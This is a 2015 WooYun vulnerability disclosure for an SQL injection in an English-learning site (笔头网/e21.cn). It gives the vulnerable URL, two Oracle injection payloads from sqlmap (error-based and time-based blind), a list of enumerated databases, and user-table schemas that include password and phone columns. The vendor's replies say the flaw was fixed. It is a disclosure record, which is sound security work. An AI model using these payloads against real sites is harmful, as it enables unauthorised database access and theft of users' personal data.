当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157774

漏洞标题:笔头网SQL注入漏洞(涉及近40w用户)

相关厂商:e21.cn

漏洞作者: 路人甲

提交时间:2015-12-03 12:13

修复时间:2016-01-04 10:39

公开时间:2016-01-04 10:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-04: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

http://denglish.e21.cn/diag/user_myclazz.do;jsessionid=D34619F852B1EF15E0EB4890AA68A335?pageNum=1&pageRows=5&grade=0&bjtype=common
grade参数存在注入

Parameter: grade (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: pageNum=1&pageRows=5&grade=0') AND 8844=CTXSYS.DRITHSX.SN(8844,(CHR(113)||CHR(107)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8844=8844) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))) AND ('ibJw'='ibJw&bjtype=common
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: pageNum=1&pageRows=5&grade=0') AND 2118=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('eRHT'='eRHT&bjtype=common
---
web application technology: JSP
back-end DBMS: Oracle
available databases [25]:
[*] APEX_030200
[*] APPQOSSYS
[*] BITOU
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DENGLISH
[*] DENGLISH3
[*] EBOOK
[*] EBOOK1
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] MDSYS
[*] NEW007
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

漏洞证明:

back-end DBMS: Oracle
Database: NEW007
+--------+---------+
| Table  | Entries |
+--------+---------+
| T_USER | 126975  |
+--------+---------+
Database: NEW007
Table: T_USER
[32 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| ADDRESS      | VARCHAR2 |
| AMOUNT       | NUMBER   |
| CARD_POINT   | NUMBER   |
| CREDIT       | NUMBER   |
| CRT_DATE     | DATE     |
| CURRENT_HOST | VARCHAR2 |
| EMAIL        | VARCHAR2 |
| GENDER       | VARCHAR2 |
| GRADE        | VARCHAR2 |
| GRADE_ID     | NUMBER   |
| IMAGE        | VARCHAR2 |
| INTRODUCE    | VARCHAR2 |
| LAST_TIME    | DATE     |
| LOGIN_COUT   | NUMBER   |
| LOGIN_NAME   | VARCHAR2 |
| MSN          | VARCHAR2 |
| NOTE         | VARCHAR2 |
| PASSWD       | VARCHAR2 |
| PHONE        | VARCHAR2 |
| PHONE_CHECK  | VARCHAR2 |
| PRIVILEGE    | VARCHAR2 |
| QQ           | VARCHAR2 |
| QQ_OPENID    | VARCHAR2 |
| REGION_ID    | NUMBER   |
| ROLE_ID      | NUMBER   |
| RRUID        | VARCHAR2 |
| SCHOOL_NAME  | VARCHAR2 |
| SINA_UID     | VARCHAR2 |
| STATUS       | VARCHAR2 |
| USER_ID      | NUMBER   |
| USER_NAME    | VARCHAR2 |
| USER_TYPE    | VARCHAR2 |
+--------------+----------+
b1.png


http://www.penglish.cn/ 笔头网--英语只能学习平台共256217个会员

back-end DBMS: Oracle
Database: BITOU
+--------+---------+
| Table  | Entries |
+--------+---------+
| T_USER | 256217  |
+--------+---------+
Database: BITOU
Table: T_USER
[51 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| ADDRESS         | VARCHAR2 |
| ALIPAY          | VARCHAR2 |
| AMOUNT          | NUMBER   |
| BIRTHDAY        | VARCHAR2 |
| BLOG_URL        | VARCHAR2 |
| CARD_POINT      | NUMBER   |
| CET_TYPE        | NUMBER   |
| CHANNEL_ID      | NUMBER   |
| CREDIT          | NUMBER   |
| CRT_DATE        | DATE     |
| CRT_OP          | VARCHAR2 |
| CURRENT_DEV     | VARCHAR2 |
| CURRENT_HOST    | VARCHAR2 |
| DS_PRODUCT_ID   | NUMBER   |
| EMAIL           | VARCHAR2 |
| EXP             | NUMBER   |
| GENDER          | VARCHAR2 |
| GRADE           | VARCHAR2 |
| GRADE_ID        | NUMBER   |
| ID_VALIDATION   | VARCHAR2 |
| IMAGE           | VARCHAR2 |
| INTRODUCE       | VARCHAR2 |
| KY_USE_DAYS     | NUMBER   |
| LAST_TIME       | DATE     |
| LOGIN_COUT      | NUMBER   |
| LOGIN_NAME      | VARCHAR2 |
| MSN             | VARCHAR2 |
| NAME            | VARCHAR2 |
| NOTE            | VARCHAR2 |
| ORG_ID          | NUMBER   |
| PARENT_PASSWORD | VARCHAR2 |
| PASSWD          | VARCHAR2 |
| PHONE           | VARCHAR2 |
| PRIVILEGE       | VARCHAR2 |
| PROMOTE_ID      | NUMBER   |
| PROMOTER_LINK   | VARCHAR2 |
| QQ              | VARCHAR2 |
| REG_FROM        | NUMBER   |
| REG_HOST        | VARCHAR2 |
| REGION_ID       | NUMBER   |
| SCHOOL          | VARCHAR2 |
| STATUS          | VARCHAR2 |
| THIRD_TYPE      | VARCHAR2 |
| THIRD_UID       | VARCHAR2 |
| USE_DAYS        | NUMBER   |
| USE_TIME        | DATE     |
| USER_ID         | NUMBER   |
| USER_NAME       | VARCHAR2 |
| USER_TYPE       | VARCHAR2 |
| VALID_DAYS      | NUMBER   |
| WX_ID           | VARCHAR2 |
+-----------------+----------
b4.png


b3.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-04 13:30

厂商回复:

本次SQL注入共计可直接影响系统的稳定性,并泄露部分数据

最新状态:

2015-12-04:这个漏洞发生在我们(e21.cn)合作企业运营的系统上。与我们(e21.cn)无直接关系。我们已通知了相关企业,他们已经处理了相关漏洞。不过,由于营运需要,将在晚一些时间后,再选择公开漏洞。由于单位体制原因,无法送出物质礼物深感抱歉。在这里非常感谢提供漏洞的白帽子!!

2016-01-04:根据合作方的要求,决定今天公开此漏洞!谢谢白帽子!